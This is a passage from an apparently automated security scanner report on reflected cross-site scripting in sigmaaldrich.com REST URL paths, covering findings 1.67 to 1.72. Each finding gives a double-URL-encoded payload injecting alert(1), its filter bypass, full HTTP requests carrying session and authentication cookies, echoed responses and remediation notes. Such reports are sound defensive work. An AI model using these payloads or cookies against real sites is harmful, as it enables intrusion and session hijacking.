bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:22 GMT
Content-Length: 28940
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry353f9";alert(1)//73f0452f72/stable-isotopes-isotec.html","E404") ;
   </script>
...[SNIP]...

1.67. http://www.sigmaaldrich.com/chemistry/stable-isotopes-isotec.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/stable-isotopes-isotec.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b19b%2522%253balert%25281%2529%252f%252fffe6be24476 was submitted in the REST URL parameter 2. This input was echoed as 8b19b";alert(1)//ffe6be24476 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/8b19b%2522%253balert%25281%2529%252f%252fffe6be24476 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:24 GMT
Content-Length: 28914
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/8b19b";alert(1)//ffe6be24476","E404") ;
   </script>
...[SNIP]...

1.68. http://www.sigmaaldrich.com/chemistry/stockroom-reagents.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/stockroom-reagents.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f87be%2522%253balert%25281%2529%252f%252f2f4b0f11aec was submitted in the REST URL parameter 1. This input was echoed as f87be";alert(1)//2f4b0f11aec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistryf87be%2522%253balert%25281%2529%252f%252f2f4b0f11aec/stockroom-reagents.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:23 GMT
Content-Length: 28937
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistryf87be";alert(1)//2f4b0f11aec/stockroom-reagents.html","E404") ;
   </script>
...[SNIP]...

1.69. http://www.sigmaaldrich.com/chemistry/stockroom-reagents.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/stockroom-reagents.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22e29%2522%253balert%25281%2529%252f%252f859e850a46d was submitted in the REST URL parameter 2. This input was echoed as 22e29";alert(1)//859e850a46d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/22e29%2522%253balert%25281%2529%252f%252f859e850a46d HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:26 GMT
Content-Length: 28914
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/22e29";alert(1)//859e850a46d","E404") ;
   </script>
...[SNIP]...

1.70. http://www.sigmaaldrich.com/configurator/servlet/DesignCenter [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /configurator/servlet/DesignCenter

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d06d%2522%253balert%25281%2529%252f%252f7602bb0231f was submitted in the REST URL parameter 1. This input was echoed as 5d06d";alert(1)//7602bb0231f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /5d06d%2522%253balert%25281%2529%252f%252f7602bb0231f/servlet/DesignCenter HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.sigmaaldrich.com/customer-service/services.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930595442&t2=1289930595676&t3=1289930598297&t4=1289930595270&lti=1289930598297&ln=&hr=/configurator/servlet/DesignCenter&fti=&fn=SearchForm%3A0%3Bemailfriend%3A1%3B&ac=&fd=&uer=&fu=&pi=/customer-service/services.html&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930595286}; bn_u=6923287736776754713; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:06 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28925


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/5d06d";alert(1)//7602bb0231f/servlet/DesignCenter","E404") ;
   </script>
...[SNIP]...

1.71. http://www.sigmaaldrich.com/content/safc-biosciences/en-us/home/services/scale-up-solutions [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/safc-biosciences/en-us/home/services/scale-up-solutions

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfd1d%2522%253balert%25281%2529%252f%252f58a78da8a9b was submitted in the REST URL parameter 1. This input was echoed as dfd1d";alert(1)//58a78da8a9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contentdfd1d%2522%253balert%25281%2529%252f%252f58a78da8a9b/safc-biosciences/en-us/home/services/scale-up-solutions HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:50 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contentdfd1d";alert(1)//58a78da8a9b/safc-biosciences/en-us/home/services/scale-up-solutions","E404") ;
   </script>
...[SNIP]...

1.72. http://www.sigmaaldrich.com/content/safc-biosciences/en-us/home/services/scale-up-solutions [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/safc-biosciences/en-us/home/services/scale-up-solutions

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db3d7%2522%253balert%25281%2529%252f%252f49e75eec73 was submitted in the REST URL parameter 2. This input was echoed as db3d7";alert(1)//49e75eec73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

